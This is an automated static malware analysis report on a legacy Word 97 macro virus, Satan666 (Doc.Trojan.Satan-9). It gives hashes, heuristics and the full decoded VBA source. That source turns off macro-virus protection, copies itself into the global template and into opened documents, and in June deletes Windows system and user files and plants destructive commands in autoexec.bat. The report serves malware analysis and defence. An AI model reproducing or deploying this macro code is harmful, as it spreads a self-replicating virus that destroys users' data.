Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 405417c855af246f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 53.0 KB
Created: 1998-05-02 16:43:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 7b7539a9bfd38c2fb9a594ec6d58039d
SHA-1: ee8ace47ef48c8f2b74574fc233fbcc39002838f
SHA-256: 405417c855af246f5b18415b8be91ca71bd30f1fd04250f8c00ec0ac11a9d229
Risk score: 298

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

This document contains legacy WordBasic macros designed to delete files and system directories when the current month is June. The macro appends batch commands to 'c:\autoexec.bat' and deletes files in 'c:\windows', 'c:\windows\system', and 'c:\My Documents'. The presence of AutoOpen and AutoClose macros, together with legacy WordBasic markers, strongly indicates malicious intent.

Heuristics (8)

  • ClamAV: Doc.Trojan.Satan-9 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Satan-9
  • VBA macros detected (medium; 3 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (critical; OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. In this sample the replication is the pair of Application.OrganizerCopy calls in Satan666, which copy the module from the active document into NormalTemplate and back from the template into newly opened documents.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro (low; OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro (low; OLE_VBA_AUTOCLOSE)
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers (high; OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region (high; OLE_SLACK_ANOMALY)
    OLE file is 54,272 bytes but its declared streams total only 30,451 bytes; 23,821 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). This rule fires on container structure alone; no finding on this page identifies a parser exploit in the slack region, and every detected behavior of this sample lives in the macro code below.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://members.xoom.com/virmike (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4110 bytes
SHA-256: 5d072e3f3ceb57163f2adddc2fdd42c0e95ef4550699a2ae4b6bab6602050cff
Detection: ClamAV: Doc.Trojan.Satan-9
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Satan666"
Sub Satan666()

Dim IFlag
Dim I

Options.VirusProtection = False

IFlag = 0

For I = 1 To WordBasic.CountMacros(0, 0)
    If WordBasic.[MacroName$](I, 0, 0) = "Satan666" Then
        IFlag = 1
    End If
Next I

If IFlag = 1 Then
    GoTo GlobalFine
Else
    On Error Resume Next
    Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Satan666", wdOrganizerObjectProjectItems
End If

GlobalFine:

IFlag = 0
    
For I = 1 To WordBasic.CountMacros(1, 0)
    If WordBasic.[MacroName$](I, 1, 0) = "Satan666" Then
        IFlag = 1
    End If
Next I
    
If IFlag = 1 Then
    GoTo DocumentFine
Else
    On Error Resume Next
    Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument.FullName, "Satan666", wdOrganizerObjectProjectItems
End If

DocumentFine:

If Month(Now()) = 6 Then

    On Error GoTo KillThem
    Open "c:\autoexec.bat" For Input As #1
    Line Input #1, IFlag
    Close #1
    If IFlag <> "REM Hail Satan!" Then
KillThem:
        Kill "c:\windows\*.*"
        Kill "c:\windows\system\*.*"
        Kill "c:\My Documents"
    
        Open "c:\autoexec.bat" For Append As #1
        Print #1, "@echo off"
        Print #1, "cls"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Y>Yes"
        Print #1, "attrib -h -r -s *.*"
        Print #1, "del *.* <Yes"
        Print #1, "end"
        Close #1
   
        MsgBox "Hail Satan!", vbOKOnly, "Satan666 Word97 Virus"
    Else
                
    End If

End If
   
End Sub
Sub FileOpen()
On Error Resume Next
Application.Run "Satan666"
Dialogs(wdDialogFileOpen).Show
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub FileClose()
On Error Resume Next
Application.Run "Satan666"
WordBasic.FileClose
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub FileSaveAs()
On Error Resume Next
Application.Run "Satan666"
Dialogs(wdDialogFileSaveAs).Show
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub FileSave()
On Error Resume Next
Application.Run "Satan666"
ActiveDocument.Save
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub FileNew()
On Error Resume Next
Application.Run "Satan666"
Dialogs(wdDialogFileNew).Show
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub AutoExec()
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub AutoNew()
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub AutoSave()
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub AutoClose()
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub AutoOpen()
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub ToolsOptions()
Dialogs(wdDialogToolsOptions).Show
On Error Resume Next
Options.VirusProtection = False
Application.Run "Satan666"
End Sub
Sub ViewVBCode()
On Error GoTo NotHome
Open "c:\autoexec.bat" For Input As #1
Line Input #1, IFlag
Close #1

If IFlag = "REM Hail Satan!" Then
    Application.ShowVisualBasicEditor = True
Else
NotHome:
    MsgBox "Sub or Function not defined", vbExclamation + vbOKOnly, "Microsoft Visual Basic"
    Application.Run "Satan666"
End If
End Sub
Sub ToolsMacro()
On Error GoTo NotHome
Open "c:\autoexec.bat" For Input As #1
Line Input #1, IFlag
Close #1

If IFlag = "REM Hail Satan!" Then
    Application.Dialogs(wdDialogToolsMacro).Show
Else
NotHome:
    MsgBox "Sub or Function not defined", vbExclamation + vbOKOnly, "Microsoft Visual Basic"
    Application.Run "Satan666"
End If
End Sub